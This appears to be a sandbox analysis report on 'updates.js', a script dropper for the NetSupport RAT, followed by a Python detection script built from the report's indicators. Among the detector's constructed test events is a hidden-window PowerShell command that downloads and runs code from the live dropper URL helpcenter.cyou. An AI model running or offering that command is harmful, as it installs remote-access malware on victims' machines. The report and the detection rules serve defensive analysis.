General

  • Target

    updates.js

  • Size

    7.3MB

  • Sample

    240703-q83x9a1aqg

  • MD5

    08001e8052c73b35e5fa47df27bcdd45

  • SHA1

    9d896ca6e114e945b2ef5b22eb92d08247722468

  • SHA256

    c5bc6a2aadb6733ce4850145f9a1fcf5b2cdd0eb1a69f48af9e8867592fcbdd3

  • SHA512

    1262b48a72375b52aed6cd9c0631178d489778c29a063f2c716630e2996473faad6185fcd968fbcc38a069bd1a7b5f1ee86c7ad54d53607b9337368a8447efad

  • SSDEEP

    49152:47h4zjCxb7qHlp4BOlN0KFhcuscyEMzYsm7++86mn3Ef/Vf7GI0/3qp6RCgScEQX:c

Malware Config

Extracted

  • Language

    ps1

  • Source

    URLs

  • URLs

    ps1.dropper: http://helpcenter.cyou/help.php?14353

    exe.dropper: http://helpcenter.cyou/help.php?14353

Targets

    • Target

      updates.js (size and hashes as listed under General)

    • NetSupport

      NetSupport Manager is a commercial remote access tool sold as legitimate system administration software; it is regularly repackaged and delivered as a RAT.

    • Blocklisted process makes network request

      A process the sandbox treats as suspicious when it reaches the network (script hosts and other living-off-the-land binaries) made an outbound request.

    • Command and Scripting Interpreter: PowerShell (T1059.001)

      Runs PowerShell with its display window hidden (the -WindowStyle Hidden launch option).

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence that restricts execution to (or away from) certain regions.

    • Executes dropped EXE

      An executable written to disk during execution was launched.

    • Loads dropped DLL

      A DLL written to disk during execution was loaded.

    • Adds Run key to start application (T1547.001)

      Writes a value under the CurrentVersion\Run registry key so the application starts at user logon (persistence).
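The signatures listed above and the extracted dropper URL, turned into detection logic: an added example that is not part of this report or of the sandbox's own signature set. It runs the equivalent checks over a few constructed EDR-style events that model the reported chain (wscript.exe running updates.js, contact with helpcenter.cyou, hidden-window PowerShell, the registry country lookup, a dropped binary, a Run key). The event schema, the script-host list, the drop directories, the `Control Panel\International\Geo` key used for the country lookup and the dropped file name `client32.exe` are assumptions; the host, the URL and the file name updates.js come from the report.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# IOCs and names taken from the report.
DROPPER_HOST = "helpcenter.cyou"
DROPPER_URL = "http://helpcenter.cyou/help.php?14353"
SAMPLE_NAME = "updates.js"

# Script hosts whose outbound connections are treated as suspicious
# ("Blocklisted process makes network request"). Assumed list, not the
# sandbox's own blocklist.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}

# User-writable locations where a dropped payload typically lands (assumption).
DROP_DIRS = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\", "\\downloads\\")

# powershell.exe accepts any unambiguous prefix of -WindowStyle, so match
# "-w hidden" through "-windowstyle hidden" (and the numeric form, Hidden = 1).
_WS_PREFIXES = "|".join("windowstyle"[:i] for i in range(len("windowstyle"), 0, -1))
HIDDEN_WINDOW_RE = re.compile(rf"(?:^|\s)-(?:{_WS_PREFIXES})\s+(?:hidden|1)(?=\s|$)", re.I)

RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(?:once)?\\", re.I)
# Windows stores the configured country (GeoID) under this key; reading its
# "Nation" value is the lookup assumed behind "Checks computer location settings".
GEO_KEY_RE = re.compile(r"\\control panel\\international\\geo$", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_drop_dir(path: str) -> bool:
    return any(d in path.lower() for d in DROP_DIRS)


def rule_script_host_network(ev: Event) -> bool:
    """Blocklisted process makes network request."""
    return ev["type"] == "network" and basename(ev["image"]) in SCRIPT_HOSTS


def rule_dropper_contact(ev: Event) -> bool:
    """Contact with the extracted ps1/exe dropper URL, by connection or command line."""
    if ev["type"] == "network":
        return ev.get("dest_host", "").lower() == DROPPER_HOST
    return ev["type"] == "process" and DROPPER_URL in ev.get("cmd", "")


def rule_powershell_hidden(ev: Event) -> bool:
    """Command and Scripting Interpreter: PowerShell with the display window hidden."""
    return (ev["type"] == "process"
            and basename(ev["image"]) in {"powershell.exe", "pwsh.exe"}
            and HIDDEN_WINDOW_RE.search(ev.get("cmd", "")) is not None)


def rule_geo_lookup(ev: Event) -> bool:
    """Checks computer location settings (country code read from the registry)."""
    return (ev["type"] == "registry_read"
            and GEO_KEY_RE.search(ev["key"]) is not None
            and ev.get("value", "").lower() == "nation")


def rule_run_key(ev: Event) -> bool:
    """Adds Run key to start application."""
    return ev["type"] == "registry_set" and RUN_KEY_RE.search(ev["key"]) is not None


def rule_dropped_exe(ev: Event) -> bool:
    """Executes dropped EXE: a binary in a drop directory spawned by a script host."""
    return (ev["type"] == "process"
            and in_drop_dir(ev["image"])
            and basename(ev.get("parent", "")) in SCRIPT_HOSTS)


RULES = [rule_script_host_network, rule_dropper_contact, rule_powershell_hidden,
         rule_geo_lookup, rule_run_key, rule_dropped_exe]


def run_rules(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires, in event order."""
    return [(i, rule.__name__) for i, ev in enumerate(events) for rule in RULES if rule(ev)]


# Constructed EDR-style events modelling the reported chain; not telemetry
# captured from the sample. client32.exe is an assumed dropped file name.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
DROPPED = r"C:\Users\u\AppData\Roaming\Updater\client32.exe"
SAMPLE_EVENTS: List[Event] = [
    {"type": "process", "image": WSCRIPT, "parent": r"C:\Windows\explorer.exe",
     "cmd": rf'wscript.exe "C:\Users\u\Downloads\{SAMPLE_NAME}"'},
    {"type": "network", "image": WSCRIPT, "dest_host": DROPPER_HOST},
    {"type": "process", "image": PS, "parent": WSCRIPT,
     "cmd": f'powershell.exe -nop -w hidden -ep bypass -c "iex (iwr {DROPPER_URL})"'},
    {"type": "registry_read", "image": PS, "key": r"HKCU\Control Panel\International\Geo", "value": "Nation"},
    {"type": "process", "image": DROPPED, "parent": PS, "cmd": "client32.exe"},
    {"type": "registry_set", "image": PS, "data": DROPPED,
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": "notepad.exe"},  # benign control event: no rule should fire
]

if __name__ == "__main__":
    for idx, name in run_rules(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The rules are deliberately keyed on the behaviours rather than on the hashes: a repacked updates.js changes every digest in the General section, but the hidden-window PowerShell launch, the country lookup and the Run key survive repacking. The dropper host is the one IOC worth pushing to proxy and DNS blocklists alongside the behavioural rules.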
